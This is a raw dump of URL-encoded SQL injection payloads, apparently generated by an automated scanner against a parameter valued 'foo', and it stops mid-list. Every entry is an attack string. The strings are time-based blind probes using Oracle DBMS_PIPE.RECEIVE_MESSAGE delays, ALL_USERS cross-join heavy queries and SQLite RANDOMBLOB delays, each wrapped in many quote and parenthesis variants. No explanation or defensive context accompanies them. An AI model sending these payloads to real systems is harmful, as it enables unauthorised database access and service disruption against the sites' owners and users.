foo%27%20IN%20BOOLEAN%20MODE%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20%23 foo%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29-- foo%27%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29-- foo%27%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29-- foo%22%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29-- foo%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%283716%3D3716 foo%29%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%284158%3D4158 foo%29%29%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%28%287800%3D7800 foo%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29-- foo%27%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%27CFQR%27%3D%27CFQR foo%27%29%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%28%27fvso%27%3D%27fvso foo%27%29%29%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%28%28%27oFzl%27%3D%27oFzl foo%27%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%27dfxy%27%3D%27dfxy foo%27%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%27VcZI%27%20LIKE%20%27VcZI foo%27%29%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%28%27Cjpq%27%20LIKE%20%27Cjpq foo%27%29%29%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%28%28%27iiJg%27%20LIKE%20%27iiJg foo%27%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%27HiKl%27%20LIKE%20%27HiKl foo%22%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%22qwse%22%3D%22qwse foo%22%29%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%28%22Dond%22%3D%22Dond foo%22%29%29%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%28%28%22rzca%22%3D%22rzca foo%22%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%22msfM%22%3D%22msfM foo%22%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%22fmFa%22%20LIKE%20%22fmFa foo%22%29%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%28%22cFGh%22%20LIKE%20%22cFGh foo%22%29%29%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%28%28%28%22qMeb%22%20LIKE%20%22qMeb foo%22%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20AND%20%22Hmpn%22%20LIKE%20%22Hmpn foo%29%20WHERE%209584%3D9584%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29-- foo%27%29%20WHERE%203720%3D3720%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29-- foo%27%20WHERE%201175%3D1175%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29-- foo%22%20WHERE%207165%3D7165%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29-- foo%27%20%7C%7C%20%28SELECT%206488%20FROM%20DUAL%20WHERE%201454%3D1454%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%206520%20WHERE%203483%3D3483%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%203249%20FROM%20DUAL%20WHERE%205348%3D5348%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20%29 foo%20%2B%20%28SELECT%205715%20WHERE%202018%3D2018%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20%29 foo%27%20%2B%20%28SELECT%20%27UZAa%27%20FROM%20DUAL%20WHERE%204856%3D4856%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27tSfC%27%20WHERE%206406%3D6406%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%205023%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2869%29%7C%7CCHR%28103%29%7C%7CCHR%28106%29%7C%7CCHR%28110%29%2C5%29--%20%23 foo%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%27%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%27%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%22%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%285631%3D5631 foo%29%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%286322%3D6322 foo%29%29%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%282779%3D2779 foo%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%27%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27OYvl%27%3D%27OYvl foo%27%29%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27KZHD%27%3D%27KZHD foo%27%29%29%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27ykIq%27%3D%27ykIq foo%27%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27KNsA%27%3D%27KNsA foo%27%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27dkZY%27%20LIKE%20%27dkZY foo%27%29%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27NHrf%27%20LIKE%20%27NHrf foo%27%29%29%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27NOTf%27%20LIKE%20%27NOTf foo%27%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27Vzom%27%20LIKE%20%27Vzom foo%22%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22kJse%22%3D%22kJse foo%22%29%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22PeNc%22%3D%22PeNc foo%22%29%29%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22FAIT%22%3D%22FAIT foo%22%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22xiTC%22%3D%22xiTC foo%22%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22zAMO%22%20LIKE%20%22zAMO foo%22%29%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22ziGs%22%20LIKE%20%22ziGs foo%22%29%29%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22Ilwk%22%20LIKE%20%22Ilwk foo%22%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22CwMn%22%20LIKE%20%22CwMn foo%29%20WHERE%206038%3D6038%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%27%29%20WHERE%204824%3D4824%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%27%20WHERE%204720%3D4720%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%22%20WHERE%204924%3D4924%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%27%20%7C%7C%20%28SELECT%203324%20FROM%20DUAL%20WHERE%205587%3D5587%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%206274%20WHERE%207160%3D7160%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%208398%20FROM%20DUAL%20WHERE%208246%3D8246%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29 foo%20%2B%20%28SELECT%204139%20WHERE%203600%3D3600%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29 foo%27%20%2B%20%28SELECT%20%27oVJE%27%20FROM%20DUAL%20WHERE%203455%3D3455%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27mFgf%27%20WHERE%209680%3D9680%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%205259%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%23 foo%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%286071%3D6071 foo%29%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%284011%3D4011 foo%29%29%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%284260%3D4260 foo%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%27yCAS%27%3D%27yCAS foo%27%29%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%27yaoM%27%3D%27yaoM foo%27%29%29%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%27ucmj%27%3D%27ucmj foo%27%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%27YIdl%27%3D%27YIdl foo%27%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%27DJdF%27%20LIKE%20%27DJdF foo%27%29%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%27jGLB%27%20LIKE%20%27jGLB foo%27%29%29%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%27gpeE%27%20LIKE%20%27gpeE foo%27%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%27lcLh%27%20LIKE%20%27lcLh foo%22%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%22mYiA%22%3D%22mYiA foo%22%29%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%22orKd%22%3D%22orKd foo%22%29%29%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%22qOqK%22%3D%22qOqK foo%22%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%22oIOe%22%3D%22oIOe foo%22%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%22WWFf%22%20LIKE%20%22WWFf foo%22%29%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%22xTap%22%20LIKE%20%22xTap foo%22%29%29%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%22NxEA%22%20LIKE%20%22NxEA foo%22%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%22FclO%22%20LIKE%20%22FclO foo%29%20WHERE%205758%3D5758%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%29%20WHERE%206357%3D6357%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%20WHERE%209689%3D9689%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%20WHERE%201890%3D1890%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%20%7C%7C%20%28SELECT%205667%20FROM%20DUAL%20WHERE%201698%3D1698%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%209685%20WHERE%207934%3D7934%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%205351%20FROM%20DUAL%20WHERE%204354%3D4354%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29 foo%20%2B%20%28SELECT%209630%20WHERE%202574%3D2574%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29 foo%27%20%2B%20%28SELECT%20%27dtfo%27%20FROM%20DUAL%20WHERE%202263%3D2263%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27tGYz%27%20WHERE%206616%3D6616%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%206427%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20%23 foo%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 foo%27%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 foo%27%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 foo%22%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 foo%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%282180%3D2180 foo%29%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%288501%3D8501 foo%29%29%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%287392%3D7392 foo%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29 foo%27%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%27EDtm%27%3D%27EDtm foo%27%29%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%27URyP%27%3D%27URyP foo%27%29%29%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%28%27JIzM%27%3D%27JIzM foo%27%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%27kfht%27%3D%27kfht foo%27%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%27DjnU%27%20LIKE%20%27DjnU foo%27%29%29%20AND%202575%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%2850000000%29%29%29%29%20AND%20%28%28%27Xufv%27%20LIKE%20%27Xufv 